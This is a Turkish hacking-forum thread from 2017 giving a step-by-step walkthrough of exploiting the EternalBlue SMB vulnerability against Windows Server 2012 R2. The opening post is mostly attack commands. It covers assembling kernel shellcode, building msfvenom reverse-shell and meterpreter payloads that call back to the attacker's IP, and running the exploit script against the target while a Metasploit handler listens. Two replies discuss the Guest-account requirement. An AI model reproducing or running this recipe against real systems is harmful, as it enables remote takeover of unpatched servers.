1. Duyuruyu Kapat

EternalBlue Açıgından Windows Server 2012 r2 Hackleme

'Video' forumunda tababa86 tarafından 16 Temmuz 2017 tarihinde açılan konu

  1. tababa86

    tababa86 Albay

    Katılım:
    12 Mart 2016
    Mesaj:
    975
    Beğeniler:
    67
    Cinsiyet:
    Erkek
    Şehir:
    Kore
    videosu =>



    eternalblue exploit etme ve Server 2012 de meterpreter oturumu açmak...
    2 payload anlatıldı...
    virtualbox lab kullandım...

    kurban:win 2012 r2
    işletim türü :x64 bit


    Gereklilikler

    1- nasm
    2 python 2.7
    3 metasploit
    4.virtualbox


    network bridged agı kullandım..Ana bilgisayar kali kurulu virtualbox ise win serv 2012 kurdum...

    Hedef Makine:windows 2012 r2 x64
    ip adresi:192.168.1.103
    saldıran Makine :kali linux 2017.1
    ip adresi: 192.168.1.105


    #eternalblue_x64_kshellcode-asm kaynak kodları indiriniz...
    https://gist.github.com/worawit/05105fce9e126ac9c85325f0b05d6501

    cd Desktop
    mkdir eternalblue //klasör oluşturmak için...
    cd eternalblue
    nasm -f bin kernel_shell_x64.asm //assemble etmek için nasm kullanın...


    Shell payload olusturmak için ;
    msfvenom -p windows/x64/shell/reverse_tcp -f raw -o shell_msf.bin EXITFUNC=thread
    lhost=192.168.1.105 lport=4444

    meterpreter payload oluşturmak için ;
    msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o shell_msf.bin EXITFUNC=thread
    lhost=192.168.1.105 lport=4444

    shellcode+shell/reverse_tcp kodları birleştirmek

    cat kernel_shell_x64 shell_msf.bin > reverse_shell.bin

    cat kernel_shell_x64 meterpreter_msf.bin > meterpreter.bin

    get exploit > eternalblue_exploit.py
    şimdi sıra geldi exploit indirip kullanmaya ...Şuradan kodları alın =>https://gist.github.com/worawit/074a27e90a3686506fc586249934a30e
    nano eternalblue_exploit.py
    yapıştırın ve kaydedin...
    aşagıdaki gibi exploitteki alanları değişitiriniz.
    username='Guest'
    password=''


    shell açmak için;
    msf açınız...
    msf>use exploit/multi/hundler
    msf> set payload windows/x64/shell/reverse_tcp
    msf>set lhost 192.168.1.105
    msf>set lport 4444
    msf>run


    exploit çalıştırma... burada shell oturumu açmak için reverse_shell.bin kullanınız...

    #python eternalblue_exploit.py 192.168.1.103 reverse_shell.bin 500

    meterpreter oturumu açmak için ise;
    msf açın.
    msf>use exploit/multi/hundler
    msf> set payload windows/x64/meterpreter/reverse_tcp
    msf>set lhost 192.168.1.105
    msf>set lport 4444
    msf>run

    sonra exploitden meterpreter.bin kullanın...
    #python eternalblue_exploit.py 192.168.1.103 meterpreter.bin 500

    kaynak :https://www.exploit-db.com/docs/42280.pdf
     
    poyrazkaan bunu beğendi.
  2. mk148a

    mk148a New Member

    Katılım:
    13 Ağustos 2017
    Mesaj:
    1
    Beğeniler:
    0
    Hocam bunu yapabilmek için Windows 8, 8.1 ve server 2012 de Guest hesabı açık olması gerekli değil mi?
     
  3. tababa86

    tababa86 Albay

    Katılım:
    12 Mart 2016
    Mesaj:
    975
    Beğeniler:
    67
    Cinsiyet:
    Erkek
    Şehir:
    Kore
    Hem açık hemde kapalı denedim exploit ediyor.
     

Bu Sayfayı Paylaş

Share